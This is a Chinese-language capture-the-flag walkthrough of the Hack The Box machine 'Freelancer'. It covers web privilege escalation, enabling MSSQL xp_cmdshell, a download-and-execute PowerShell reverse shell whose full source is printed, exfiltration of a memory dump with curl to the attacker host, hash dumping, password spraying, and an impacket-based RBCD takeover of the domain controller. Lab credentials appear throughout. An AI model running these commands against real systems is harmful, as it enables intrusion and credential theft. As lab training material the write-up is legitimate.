前言

Hack The Box的一个域渗透靶机，官方难度评级为hard，整体打下来感觉挺符合实际渗透的一些场景，主要涉及到垂直越权、MSSQL命令执行、DMP文件泄露、域控RBCD利用等技术，是台值得一练的靶机。

信息搜集

先扫一下端口

开放端口挺多，再扫一下具体信息

┌──(kali㉿kali)-[~/box/Freelancer]
└─$ cat nmap/ports.nmap| grep open | awk -F'/' '{print $1}' | tr '\n' ','         
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49676,49677,49680,54679,54683,                                                                                                                                                                                                               
┌──(kali㉿kali)-[~/box/Freelancer]
└─$ sudo nmap -sT -A -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49676,49677,49680,54679,54683 10.10.11.5 -oA nmap/details
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-07 03:18 EDT
Nmap scan report for freelancer.htb (10.10.11.5)
Host is up (0.76s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.25.5
|_http-title: Freelancer - Job Board & Hiring platform
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-07 12:18:47Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
54679/tcp open  msrpc         Microsoft Windows RPC
54683/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 5h00m00s
| smb2-time: 
|   date: 2024-08-07T12:20:11
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   793.67 ms 10.10.16.1
2   797.50 ms freelancer.htb (10.10.11.5)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.58 seconds

发现域名freelancer.htb，加入host文件

目标机器开放了88端口，常规使用kerbrute枚举一下用户

拿到几个用户名，保存下来

尝试爆破一下有没有不需要Kerberos预身份验证的用户

尝试无果后再查看一下80端口

目录扫描

1 2	┌──(kali㉿kali)-[~/box/Freelancer] └─$ dirsearch -u freelancer.htb

找到了它的admin后台，经爆破无果暂时放弃

子域名扫描，也没有扫描到什么东西

web渗透

再次返回主页，在主页看到一个登录选项和两个注册选项，先注册一个freelancer试试

在freelancer账号下逛了一圈没发现啥可以利用的点，再注册一个employer试试，这个注册的时候就直接提示需要激活才能使用

注册登录时还是提示需要激活，但是在看忘记密码的功能点时，发现把已经注册的账号重置密码，居然可以绕过激活

在QR-Code位置扫描二维码，得到一个网址

其中”MTAwMTE=”为base64编码，解码后为一个数字，猜测是id

垂直越权

一般admin的id为1，将1base64编码后替换掉刚刚qr解出来的url，但是提示key无效

经测试admin的id为2，替换url后进入admin主页

在admin已登录的情况下，去重新访问admin后台也成功登录

MSSQL利用

在admin界面看到有个sql终端可以利用，先看看xp_cmdshell开没开

1	EXEC sp_configure 'xp_cmdshell';

xp_cmdshell没开，可以以sa权限开启xp_cmdshell

EXECUTE AS LOGIN = 'sa';

-- 启用高级选项
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- 启用 xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

再次查看，发现xp_cmdshell已经开了

看看能否执行命令

1 2	EXECUTE AS LOGIN = 'sa'; EXECUTE xp_cmdshell 'whoami';

可以执行命令，那就反弹个shell吧，使用几种反弹shell都执行失败，网上找到了这个ps1

1	EXEC xp_cmdshell 'EXECUTE xp_cmdshell 'powershell -c iex(iwr -usebasicparsing http://10.10.16.23/shell.ps1)';

#she11.ps1
do {
    # Delay before establishing network connection, and between retries
    Start-Sleep -Seconds 1

    # Connect to C2
    try{
        $TCPClient = New-Object Net.Sockets.TCPClient('10.10.16.23',1234)
    } catch {}
} until ($TCPClient.Connected)

$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)

# Writes a string to C2
function WriteToStream ($String) {
    # Create buffer to be used for next network stream read. Size is determined by the TCP client recieve buffer (65536 by default)
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}

    # Write to C2
    $StreamWriter.Write($String + 'SHELL> ')
    $StreamWriter.Flush()
}

# Initial output to C2. The function also creates the inital empty byte array buffer used below.
WriteToStream ''

# Loop that breaks if NetworkStream.Read throws an exception - will happen if connection is closed.
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    # Encode command, remove last byte/newline
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
  
    # Execute command and save output (including errors thrown)
    $Output = try {
            Invoke-Expression $Command 2>&1 | Out-String
        } catch {
            $_ | Out-String
        }

    # Write output to C2
    WriteToStream ($Output)
}
# Closes the StreamWriter and the underlying TCPClient
$StreamWriter.Close()

成功拿到了shell

后渗透

拿到shell后，看到这台机器登录过很多用户，把这些用户名保存下来备用

在sql_svc用户下的C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU文件夹下，找到一份数据库配置文件，读取后可以看到有两个密码，复制下来保存到密码本备用

有了一些用户名和密码，直接内网密码喷洒碰碰运气，找到了一组账号密码：mikasaAckerman:IL0v3ErenY3ager

1	crackmapexec smb 10.10.11.5 -u user.txt -p pass.txt

拿到账号密码后，上传RunasCs横向一波

1	powershell (new-object Net.WebClient).DownloadFile('http://10.10.16.23/RunasCs.exe','C:\Users\Public\RunasCs.exe')

运行弹个shell

1	./RunasCs.exe mikasaAckerman IL0v3ErenY3ager powershell -r 10.10.16.23:9999

在该用户的桌面看到了user.txt

查看一下桌面上的mail.txt，看内容桌面上另一个文件MEMORY.7z应该是他发送的完整内存转储文件

把这个MEMORY.7z下载到本地看看

# 目标机器
cmd /c 'curl -F "file=@MEMORY.7z" http://10.10.16.23:3333/p'

# kali
./httpuploadexfil :3333 .

打开压缩包可以看到一个dmp文件

可以https://github.com/ufrisk/MemProcFS导出

1	sudo ./memprocfs -device MEMORY.DMP -mount /mnt

翻看一下几个目录，在registry/hive_files可以找到机器的SAM，SYSTEM，SECURITY

复制出来，使用secretdump工具导出hash

1	impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local

得到一串密码：PWN3D#l0rr@Armessa199，但是不知道用户名，那就拿我们之前收集到的用户名做一下密码喷洒

1	crackmapexec smb 10.10.11.5 -u user.txt -p PWN3D#l0rr@Armessa199

成功拿到一组用户名密码lorra199:PWN3D#l0rr@Armessa199，直接使用winrm登录

1	evil-winrm -i 10.10.11.5 -u lorra199 -p "PWN3D#l0rr@Armessa199"

域控攻击(RBCD)

使用bloodhound-python导出域控信息，导出前一定要同步服务器时间

1
2
3

ntpdate -u freelancer.htb

bloodhound-python -c ALL -u lorra199 -p 'PWN3D#l0rr@Armessa199' -d freelancer.htb -ns 10.10.11.5

Bloodhound打开生成的文件，发现lorra199用户隶属于AD RECYLE BIN组，而AD RECYLE BIN组对DC又有着GenericWrite的权限，可以修改该账户的属性，包括设置或更改允许委派到的服务列表，这可以实现基于资源的约束性委派(RBCD)

有了思路开始实施，首先新建一个机器

1	impacket-addcomputer freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199' -dc-ip 10.10.11.5

然后使用基于资源的约束委派（RBCD）工具将新建的机器到dc的委派上，允许执行委派的机器在一定条件下冒充任意用户对目标机器进行操作

1	impacket-rbcd -delegate-from 'DESKTOP-Z5W2UXMM$' -delegate-to 'dc$' -dc-ip 10.10.11.5 -action write freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'

使用getST获取服务票据以访问服务CIFS

1	impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate Administrator -dc-ip 10.10.11.5 freelancer.htb/DESKTOP-Z5W2UXMM$:'83fEpK1o8uyLpodcR7anH376NL7C2z5k'

导入进票据，然后使用secretdump获取hash值

1 2	export KRB5CCNAME=Administrator.ccache impacket-secretsdump 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.10.11.5 -target-ip 10.10.11.5 -just-dc-ntlm